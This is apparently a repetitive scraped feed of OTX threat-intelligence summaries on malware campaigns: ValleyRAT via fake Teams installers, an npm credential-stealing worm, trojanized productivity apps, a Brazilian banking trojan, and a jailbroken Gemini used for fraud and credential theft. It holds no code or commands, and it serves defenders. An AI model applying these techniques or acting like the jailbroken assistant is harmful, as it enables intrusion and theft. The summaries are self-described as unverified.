ValleyRAT malware is distributed through fake Microsoft Teams download sites using trojanized installers and DLL sideloading techniques. The campaign uses multi-stage execution, persistence mechanisms and encrypted C2 communication to evade detection and conduct data theft activities on compromised systems.
Pulse ID: 6a10c2d0bebcbfb2b4e42090
Pulse Link: https://otx.alienvault.com/pulse/6a10c2d0bebcbfb2b4e42090
Pulse Author: cryptocti
Created: 2026-05-22 20:55:44Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #DataTheft #InfoSec #Malware #Microsoft #MicrosoftTeams #OTX #OpenThreatExchange #RAT #SMS #SideLoading #Trojan #bot #cryptocti
-
SilverFox APT Distributes ValleyRAT Using Fake Microsoft Teams
ValleyRAT malware is distributed through fake Microsoft Teams download sites using trojanized installers and DLL sideloading techniques. The campaign uses multi-stage execution, persistence mechanisms and encrypted C2 communication to evade detection and conduct data theft activities on compromised systems.
Pulse ID: 6a10c2d0bebcbfb2b4e42090
Pulse Link: https://otx.alienvault.com/pulse/6a10c2d0bebcbfb2b4e42090
Pulse Author: cryptocti
Created: 2026-05-22 20:55:44Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #DataTheft #InfoSec #Malware #Microsoft #MicrosoftTeams #OTX #OpenThreatExchange #RAT #SMS #SideLoading #Trojan #bot #cryptocti
-
SilverFox APT Distributes ValleyRAT Using Fake Microsoft Teams
ValleyRAT malware is distributed through fake Microsoft Teams download sites using trojanized installers and DLL sideloading techniques. The campaign uses multi-stage execution, persistence mechanisms and encrypted C2 communication to evade detection and conduct data theft activities on compromised systems.
Pulse ID: 6a10c2d0bebcbfb2b4e42090
Pulse Link: https://otx.alienvault.com/pulse/6a10c2d0bebcbfb2b4e42090
Pulse Author: cryptocti
Created: 2026-05-22 20:55:44Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #DataTheft #InfoSec #Malware #Microsoft #MicrosoftTeams #OTX #OpenThreatExchange #RAT #SMS #SideLoading #Trojan #bot #cryptocti
-
SilverFox APT Distributes ValleyRAT Using Fake Microsoft Teams
ValleyRAT malware is distributed through fake Microsoft Teams download sites using trojanized installers and DLL sideloading techniques. The campaign uses multi-stage execution, persistence mechanisms and encrypted C2 communication to evade detection and conduct data theft activities on compromised systems.
Pulse ID: 6a10c2d0bebcbfb2b4e42090
Pulse Link: https://otx.alienvault.com/pulse/6a10c2d0bebcbfb2b4e42090
Pulse Author: cryptocti
Created: 2026-05-22 20:55:44Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #DataTheft #InfoSec #Malware #Microsoft #MicrosoftTeams #OTX #OpenThreatExchange #RAT #SMS #SideLoading #Trojan #bot #cryptocti
-
One Man, One AI, One Fake Persona: Inside the 5-Year Influence and Fraud 'Patriot Bait' Campaign
A solo Russian-speaking threat actor tracked as 'bandcampro' operated a five-year MAGA-themed Telegram channel with approximately 17,000 subscribers, initially forwarding cryptocurrency scam content before pivoting to AI-automated operations in September 2025. The actor utilized jailbroken Google Gemini to generate QAnon-styled posts, deploy infrastructure, manage stolen API keys, and run credential theft operations targeting politically engaged American audiences. The campaign weaponized cultural alignment with QAnon and MAGA communities to facilitate cryptocurrency fraud rather than political influence. Through AI assistance, the actor cracked 29 WordPress admin credentials, infiltrated at least one company, deployed remote access trojans disguised as cryptocurrency wallets, and operated a gamified chatbot called 'QFS 2.0 Terminal'. The operation demonstrates how frontier AI systems enable scalable, low-cost cybercriminal activities by allowing a single actor to perform tasks traditionally requiring enti...
Pulse ID: 6a0f8f3596d6a5268e168a10
Pulse Link: https://otx.alienvault.com/pulse/6a0f8f3596d6a5268e168a10
Pulse Author: AlienVault
Created: 2026-05-21 23:03:17Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #Google #InfoSec #IoT #OTX #OpenThreatExchange #RAT #RDP #RemoteAccessTrojan #Russia #Telegram #Trojan #Word #Wordpress #bot #cryptocurrency #AlienVault
-
One Man, One AI, One Fake Persona: Inside the 5-Year Influence and Fraud 'Patriot Bait' Campaign
A solo Russian-speaking threat actor tracked as 'bandcampro' operated a five-year MAGA-themed Telegram channel with approximately 17,000 subscribers, initially forwarding cryptocurrency scam content before pivoting to AI-automated operations in September 2025. The actor utilized jailbroken Google Gemini to generate QAnon-styled posts, deploy infrastructure, manage stolen API keys, and run credential theft operations targeting politically engaged American audiences. The campaign weaponized cultural alignment with QAnon and MAGA communities to facilitate cryptocurrency fraud rather than political influence. Through AI assistance, the actor cracked 29 WordPress admin credentials, infiltrated at least one company, deployed remote access trojans disguised as cryptocurrency wallets, and operated a gamified chatbot called 'QFS 2.0 Terminal'. The operation demonstrates how frontier AI systems enable scalable, low-cost cybercriminal activities by allowing a single actor to perform tasks traditionally requiring enti...
Pulse ID: 6a0f8f3596d6a5268e168a10
Pulse Link: https://otx.alienvault.com/pulse/6a0f8f3596d6a5268e168a10
Pulse Author: AlienVault
Created: 2026-05-21 23:03:17Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #Google #InfoSec #IoT #OTX #OpenThreatExchange #RAT #RDP #RemoteAccessTrojan #Russia #Telegram #Trojan #Word #Wordpress #bot #cryptocurrency #AlienVault
-
One Man, One AI, One Fake Persona: Inside the 5-Year Influence and Fraud 'Patriot Bait' Campaign
A solo Russian-speaking threat actor tracked as 'bandcampro' operated a five-year MAGA-themed Telegram channel with approximately 17,000 subscribers, initially forwarding cryptocurrency scam content before pivoting to AI-automated operations in September 2025. The actor utilized jailbroken Google Gemini to generate QAnon-styled posts, deploy infrastructure, manage stolen API keys, and run credential theft operations targeting politically engaged American audiences. The campaign weaponized cultural alignment with QAnon and MAGA communities to facilitate cryptocurrency fraud rather than political influence. Through AI assistance, the actor cracked 29 WordPress admin credentials, infiltrated at least one company, deployed remote access trojans disguised as cryptocurrency wallets, and operated a gamified chatbot called 'QFS 2.0 Terminal'. The operation demonstrates how frontier AI systems enable scalable, low-cost cybercriminal activities by allowing a single actor to perform tasks traditionally requiring enti...
Pulse ID: 6a0f8f3596d6a5268e168a10
Pulse Link: https://otx.alienvault.com/pulse/6a0f8f3596d6a5268e168a10
Pulse Author: AlienVault
Created: 2026-05-21 23:03:17Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #Google #InfoSec #IoT #OTX #OpenThreatExchange #RAT #RDP #RemoteAccessTrojan #Russia #Telegram #Trojan #Word #Wordpress #bot #cryptocurrency #AlienVault
-
One Man, One AI, One Fake Persona: Inside the 5-Year Influence and Fraud 'Patriot Bait' Campaign
A solo Russian-speaking threat actor tracked as 'bandcampro' operated a five-year MAGA-themed Telegram channel with approximately 17,000 subscribers, initially forwarding cryptocurrency scam content before pivoting to AI-automated operations in September 2025. The actor utilized jailbroken Google Gemini to generate QAnon-styled posts, deploy infrastructure, manage stolen API keys, and run credential theft operations targeting politically engaged American audiences. The campaign weaponized cultural alignment with QAnon and MAGA communities to facilitate cryptocurrency fraud rather than political influence. Through AI assistance, the actor cracked 29 WordPress admin credentials, infiltrated at least one company, deployed remote access trojans disguised as cryptocurrency wallets, and operated a gamified chatbot called 'QFS 2.0 Terminal'. The operation demonstrates how frontier AI systems enable scalable, low-cost cybercriminal activities by allowing a single actor to perform tasks traditionally requiring enti...
Pulse ID: 6a0f8f3596d6a5268e168a10
Pulse Link: https://otx.alienvault.com/pulse/6a0f8f3596d6a5268e168a10
Pulse Author: AlienVault
Created: 2026-05-21 23:03:17Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #Google #InfoSec #IoT #OTX #OpenThreatExchange #RAT #RDP #RemoteAccessTrojan #Russia #Telegram #Trojan #Word #Wordpress #bot #cryptocurrency #AlienVault
-
One Man, One AI, One Fake Persona: Inside the 5-Year Influence and Fraud 'Patriot Bait' Campaign
A solo Russian-speaking threat actor tracked as 'bandcampro' operated a five-year MAGA-themed Telegram channel with approximately 17,000 subscribers, initially forwarding cryptocurrency scam content before pivoting to AI-automated operations in September 2025. The actor utilized jailbroken Google Gemini to generate QAnon-styled posts, deploy infrastructure, manage stolen API keys, and run credential theft operations targeting politically engaged American audiences. The campaign weaponized cultural alignment with QAnon and MAGA communities to facilitate cryptocurrency fraud rather than political influence. Through AI assistance, the actor cracked 29 WordPress admin credentials, infiltrated at least one company, deployed remote access trojans disguised as cryptocurrency wallets, and operated a gamified chatbot called 'QFS 2.0 Terminal'. The operation demonstrates how frontier AI systems enable scalable, low-cost cybercriminal activities by allowing a single actor to perform tasks traditionally requiring enti...
Pulse ID: 6a0f8f3596d6a5268e168a10
Pulse Link: https://otx.alienvault.com/pulse/6a0f8f3596d6a5268e168a10
Pulse Author: AlienVault
Created: 2026-05-21 23:03:17Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #Google #InfoSec #IoT #OTX #OpenThreatExchange #RAT #RDP #RemoteAccessTrojan #Russia #Telegram #Trojan #Word #Wordpress #bot #cryptocurrency #AlienVault
-
SilverFox APT Distributes ValleyRAT Using Fake Microsoft Teams
ValleyRAT malware is distributed through fake Microsoft Teams
download sites using trojanized installers and DLL sideloading
techniques. The campaign uses multi-stage execution, persistence
mechanisms and encrypted C2 communication to evade detection and
conduct data theft activities on compromised systems.Pulse ID: 6a0f791e50f93201e61e0f88
Pulse Link: https://otx.alienvault.com/pulse/6a0f791e50f93201e61e0f88
Pulse Author: cryptocti
Created: 2026-05-21 21:29:02Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #DataTheft #InfoSec #Malware #Microsoft #MicrosoftTeams #OTX #OpenThreatExchange #RAT #SMS #SideLoading #Trojan #bot #cryptocti
-
SilverFox APT Distributes ValleyRAT Using Fake Microsoft Teams
ValleyRAT malware is distributed through fake Microsoft Teams
download sites using trojanized installers and DLL sideloading
techniques. The campaign uses multi-stage execution, persistence
mechanisms and encrypted C2 communication to evade detection and
conduct data theft activities on compromised systems.Pulse ID: 6a0f791e50f93201e61e0f88
Pulse Link: https://otx.alienvault.com/pulse/6a0f791e50f93201e61e0f88
Pulse Author: cryptocti
Created: 2026-05-21 21:29:02Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #DataTheft #InfoSec #Malware #Microsoft #MicrosoftTeams #OTX #OpenThreatExchange #RAT #SMS #SideLoading #Trojan #bot #cryptocti
-
SilverFox APT Distributes ValleyRAT Using Fake Microsoft Teams
ValleyRAT malware is distributed through fake Microsoft Teams
download sites using trojanized installers and DLL sideloading
techniques. The campaign uses multi-stage execution, persistence
mechanisms and encrypted C2 communication to evade detection and
conduct data theft activities on compromised systems.Pulse ID: 6a0f791e50f93201e61e0f88
Pulse Link: https://otx.alienvault.com/pulse/6a0f791e50f93201e61e0f88
Pulse Author: cryptocti
Created: 2026-05-21 21:29:02Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #DataTheft #InfoSec #Malware #Microsoft #MicrosoftTeams #OTX #OpenThreatExchange #RAT #SMS #SideLoading #Trojan #bot #cryptocti
-
SilverFox APT Distributes ValleyRAT Using Fake Microsoft Teams
ValleyRAT malware is distributed through fake Microsoft Teams
download sites using trojanized installers and DLL sideloading
techniques. The campaign uses multi-stage execution, persistence
mechanisms and encrypted C2 communication to evade detection and
conduct data theft activities on compromised systems.Pulse ID: 6a0f791e50f93201e61e0f88
Pulse Link: https://otx.alienvault.com/pulse/6a0f791e50f93201e61e0f88
Pulse Author: cryptocti
Created: 2026-05-21 21:29:02Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #DataTheft #InfoSec #Malware #Microsoft #MicrosoftTeams #OTX #OpenThreatExchange #RAT #SMS #SideLoading #Trojan #bot #cryptocti
-
SilverFox APT Distributes ValleyRAT Using Fake Microsoft Teams
ValleyRAT malware is distributed through fake Microsoft Teams
download sites using trojanized installers and DLL sideloading
techniques. The campaign uses multi-stage execution, persistence
mechanisms and encrypted C2 communication to evade detection and
conduct data theft activities on compromised systems.Pulse ID: 6a0f791e50f93201e61e0f88
Pulse Link: https://otx.alienvault.com/pulse/6a0f791e50f93201e61e0f88
Pulse Author: cryptocti
Created: 2026-05-21 21:29:02Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #DataTheft #InfoSec #Malware #Microsoft #MicrosoftTeams #OTX #OpenThreatExchange #RAT #SMS #SideLoading #Trojan #bot #cryptocti
-
Inside a Tor Backed Supply Chain Worm
A sophisticated npm supply chain attack was uncovered involving the typosquatted package crypto-javascri, designed to mimic the legitimate crypto-js library. The malware harvests npm and GitHub credentials from infected systems, hijacks maintainer accounts, and automatically republishes trojanized versions of packages under trusted identities. The final payload incorporates a weaponized Arti Tor client with credential theft, cryptomining capabilities, privilege escalation via SUID exploitation, and systemd-based persistence mechanisms. The campaign specifically targets Linux developer systems and CI/CD environments, using Tor-based command-and-control infrastructure to maintain anonymity and resilience. The attack creates significant downstream supply chain risk through its worm-like propagation model.
Pulse ID: 6a0d970b3015e77563f4a9fa
Pulse Link: https://otx.alienvault.com/pulse/6a0d970b3015e77563f4a9fa
Pulse Author: AlienVault
Created: 2026-05-20 11:12:11Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CryptoMining #CyberSecurity #GitHub #InfoSec #Java #Linux #Malware #Mimic #NPM #OTX #OpenThreatExchange #RAT #Rust #SMS #SupplyChain #Trojan #Worm #bot #AlienVault
-
Tracking TamperedChef Clusters via Certificate and Code Reuse
Multiple threat clusters designated as CL-CRI-1089, CL-UNK-1090, and CL-UNK-1110 have been distributing trojanized productivity software through malicious advertising campaigns since 2023. These applications, including PDF editors, calendars, and compression tools, appear legitimate but contain remote access capabilities enabling deployment of information stealers, proxy tooling, and RATs. The campaigns leverage code-signing certificates, remain dormant for weeks to months before activation, and affect organizations globally with over 4,000 samples identified across 100 variants. CL-CRI-1089 operations utilize Ukrainian, Malaysian, and British infrastructure with 34 unique code-signing entities, while CL-UNK-1090 demonstrates vertical integration between advertising agencies and malware creation using primarily Israeli infrastructure with 39 corporations involved. Distribution occurs through sophisticated malvertising employing professional websites, CDN delivery, and search engine optimization techniques.
Pulse ID: 6a0dae41682ec38e55d1aa12
Pulse Link: https://otx.alienvault.com/pulse/6a0dae41682ec38e55d1aa12
Pulse Author: AlienVault
Created: 2026-05-20 12:51:13Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CDN #CyberSecurity #InfoSec #Israel #Malvertising #Malware #OTX #OpenThreatExchange #PDF #Proxy #RAT #Trojan #UK #Ukr #Ukrainian #bot #AlienVault
-
Tracking TamperedChef Clusters via Certificate and Code Reuse
Multiple threat clusters designated as CL-CRI-1089, CL-UNK-1090, and CL-UNK-1110 have been distributing trojanized productivity software through malicious advertising campaigns since 2023. These applications, including PDF editors, calendars, and compression tools, appear legitimate but contain remote access capabilities enabling deployment of information stealers, proxy tooling, and RATs. The campaigns leverage code-signing certificates, remain dormant for weeks to months before activation, and affect organizations globally with over 4,000 samples identified across 100 variants. CL-CRI-1089 operations utilize Ukrainian, Malaysian, and British infrastructure with 34 unique code-signing entities, while CL-UNK-1090 demonstrates vertical integration between advertising agencies and malware creation using primarily Israeli infrastructure with 39 corporations involved. Distribution occurs through sophisticated malvertising employing professional websites, CDN delivery, and search engine optimization techniques.
Pulse ID: 6a0dae41682ec38e55d1aa12
Pulse Link: https://otx.alienvault.com/pulse/6a0dae41682ec38e55d1aa12
Pulse Author: AlienVault
Created: 2026-05-20 12:51:13Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CDN #CyberSecurity #InfoSec #Israel #Malvertising #Malware #OTX #OpenThreatExchange #PDF #Proxy #RAT #Trojan #UK #Ukr #Ukrainian #bot #AlienVault
-
Tracking TamperedChef Clusters via Certificate and Code Reuse
Multiple threat clusters designated as CL-CRI-1089, CL-UNK-1090, and CL-UNK-1110 have been distributing trojanized productivity software through malicious advertising campaigns since 2023. These applications, including PDF editors, calendars, and compression tools, appear legitimate but contain remote access capabilities enabling deployment of information stealers, proxy tooling, and RATs. The campaigns leverage code-signing certificates, remain dormant for weeks to months before activation, and affect organizations globally with over 4,000 samples identified across 100 variants. CL-CRI-1089 operations utilize Ukrainian, Malaysian, and British infrastructure with 34 unique code-signing entities, while CL-UNK-1090 demonstrates vertical integration between advertising agencies and malware creation using primarily Israeli infrastructure with 39 corporations involved. Distribution occurs through sophisticated malvertising employing professional websites, CDN delivery, and search engine optimization techniques.
Pulse ID: 6a0dae41682ec38e55d1aa12
Pulse Link: https://otx.alienvault.com/pulse/6a0dae41682ec38e55d1aa12
Pulse Author: AlienVault
Created: 2026-05-20 12:51:13Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CDN #CyberSecurity #InfoSec #Israel #Malvertising #Malware #OTX #OpenThreatExchange #PDF #Proxy #RAT #Trojan #UK #Ukr #Ukrainian #bot #AlienVault
-
Tracking TamperedChef Clusters via Certificate and Code Reuse
Multiple threat clusters designated as CL-CRI-1089, CL-UNK-1090, and CL-UNK-1110 have been distributing trojanized productivity software through malicious advertising campaigns since 2023. These applications, including PDF editors, calendars, and compression tools, appear legitimate but contain remote access capabilities enabling deployment of information stealers, proxy tooling, and RATs. The campaigns leverage code-signing certificates, remain dormant for weeks to months before activation, and affect organizations globally with over 4,000 samples identified across 100 variants. CL-CRI-1089 operations utilize Ukrainian, Malaysian, and British infrastructure with 34 unique code-signing entities, while CL-UNK-1090 demonstrates vertical integration between advertising agencies and malware creation using primarily Israeli infrastructure with 39 corporations involved. Distribution occurs through sophisticated malvertising employing professional websites, CDN delivery, and search engine optimization techniques.
Pulse ID: 6a0dae41682ec38e55d1aa12
Pulse Link: https://otx.alienvault.com/pulse/6a0dae41682ec38e55d1aa12
Pulse Author: AlienVault
Created: 2026-05-20 12:51:13Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CDN #CyberSecurity #InfoSec #Israel #Malvertising #Malware #OTX #OpenThreatExchange #PDF #Proxy #RAT #Trojan #UK #Ukr #Ukrainian #bot #AlienVault
-
Tracking TamperedChef Clusters via Certificate and Code Reuse
Multiple threat clusters designated as CL-CRI-1089, CL-UNK-1090, and CL-UNK-1110 have been distributing trojanized productivity software through malicious advertising campaigns since 2023. These applications, including PDF editors, calendars, and compression tools, appear legitimate but contain remote access capabilities enabling deployment of information stealers, proxy tooling, and RATs. The campaigns leverage code-signing certificates, remain dormant for weeks to months before activation, and affect organizations globally with over 4,000 samples identified across 100 variants. CL-CRI-1089 operations utilize Ukrainian, Malaysian, and British infrastructure with 34 unique code-signing entities, while CL-UNK-1090 demonstrates vertical integration between advertising agencies and malware creation using primarily Israeli infrastructure with 39 corporations involved. Distribution occurs through sophisticated malvertising employing professional websites, CDN delivery, and search engine optimization techniques.
Pulse ID: 6a0dae41682ec38e55d1aa12
Pulse Link: https://otx.alienvault.com/pulse/6a0dae41682ec38e55d1aa12
Pulse Author: AlienVault
Created: 2026-05-20 12:51:13Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CDN #CyberSecurity #InfoSec #Israel #Malvertising #Malware #OTX #OpenThreatExchange #PDF #Proxy #RAT #Trojan #UK #Ukr #Ukrainian #bot #AlienVault
-
Inside Banana RAT: From Build Server to Banking Fraud
An MDR investigation successfully mapped the complete operational infrastructure of Banana RAT, a Brazilian banking trojan operated by threat cluster SHADOW-WATER-063. The investigation uncovered both server-side and client-side components, revealing a sophisticated FastAPI-based polymorphic payload generation system that produces hash-unique builds to evade detection. The malware employs layered obfuscation, AES-wrapped payloads, and fileless PowerShell execution. Once deployed, it enables operator-driven fraud through remote input control, keylogging, screen streaming, bank-branded overlays, and Pix QR code interception specifically targeting Brazilian financial institutions. The tooling exclusively targets 16 Brazilian banks and crypto exchanges, with all operator artifacts written in Brazilian Portuguese, indicating a financially motivated actor operating within the Tetrade banking trojan ecosystem.
Pulse ID: 6a0ce3af84b924ad15e27920
Pulse Link: https://otx.alienvault.com/pulse/6a0ce3af84b924ad15e27920
Pulse Author: AlienVault
Created: 2026-05-19 22:26:55Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Bank #BankingTrojan #Brazil #CryptoExchange #CyberSecurity #InfoSec #Malware #OTX #OpenThreatExchange #PowerShell #RAT #RCE #Trojan #bot #AlienVault
-
Chinese APT Campaign Targets Entities with Updated FDMTP Backdoor
Beginning in late September 2025, multiple affected hosts were observed making requests to domains impersonating content delivery networks (CDNs), including infrastructure masquerading as Yahoo- and Apple-affiliated services. Across these cases, Darktrace identified a consistent behavioral execution pattern: the retrieval of legitimate binaries alongside malicious Dynamic Link Libraries (DLLs), enabling sideloading and execution of a modular .NET-based Remote Access Trojan (RAT) framework.
Pulse ID: 6a0b6898afd39bdd2dd6f142
Pulse Link: https://otx.alienvault.com/pulse/6a0b6898afd39bdd2dd6f142
Pulse Author: AlienVault
Created: 2026-05-18 19:29:26Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BackDoor #CDN #Chinese #CyberSecurity #DNS #Darktrace #InfoSec #NET #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SideLoading #Trojan #bot #AlienVault
-
Chinese APT Campaign Targets Entities with Updated FDMTP Backdoor
Beginning in late September 2025, multiple affected hosts were observed making requests to domains impersonating content delivery networks (CDNs), including infrastructure masquerading as Yahoo- and Apple-affiliated services. Across these cases, Darktrace identified a consistent behavioral execution pattern: the retrieval of legitimate binaries alongside malicious Dynamic Link Libraries (DLLs), enabling sideloading and execution of a modular .NET-based Remote Access Trojan (RAT) framework.
Pulse ID: 6a0b6898afd39bdd2dd6f142
Pulse Link: https://otx.alienvault.com/pulse/6a0b6898afd39bdd2dd6f142
Pulse Author: AlienVault
Created: 2026-05-18 19:29:26Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BackDoor #CDN #Chinese #CyberSecurity #DNS #Darktrace #InfoSec #NET #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SideLoading #Trojan #bot #AlienVault
-
Chinese APT Campaign Targets Entities with Updated FDMTP Backdoor
Beginning in late September 2025, multiple affected hosts were observed making requests to domains impersonating content delivery networks (CDNs), including infrastructure masquerading as Yahoo- and Apple-affiliated services. Across these cases, Darktrace identified a consistent behavioral execution pattern: the retrieval of legitimate binaries alongside malicious Dynamic Link Libraries (DLLs), enabling sideloading and execution of a modular .NET-based Remote Access Trojan (RAT) framework.
Pulse ID: 6a0b6898afd39bdd2dd6f142
Pulse Link: https://otx.alienvault.com/pulse/6a0b6898afd39bdd2dd6f142
Pulse Author: AlienVault
Created: 2026-05-18 19:29:26Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BackDoor #CDN #Chinese #CyberSecurity #DNS #Darktrace #InfoSec #NET #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SideLoading #Trojan #bot #AlienVault